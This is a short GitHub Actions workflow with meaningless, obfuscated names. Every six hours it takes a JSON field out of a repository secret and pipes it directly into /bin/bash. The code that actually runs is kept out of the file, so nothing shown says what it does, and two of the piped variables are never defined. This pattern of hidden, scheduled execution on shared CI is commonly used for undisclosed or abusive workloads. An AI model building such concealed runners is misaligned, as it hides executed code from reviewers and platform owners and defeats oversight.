name: mingyulu1837
on:
  workflow_dispatch:
  schedule:
    - cron: '44 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mingyulu1837
        env:
          lgf00: ${{ secrets.lgf00 }}
        run: |
          echo $lgf00 | jq -r .tvq83 | /bin/bash
          echo $zp7 | jq -r .hoku77502 | /bin/bash
          echo $t77879 | jq -r .rp80394 | /bin/bash

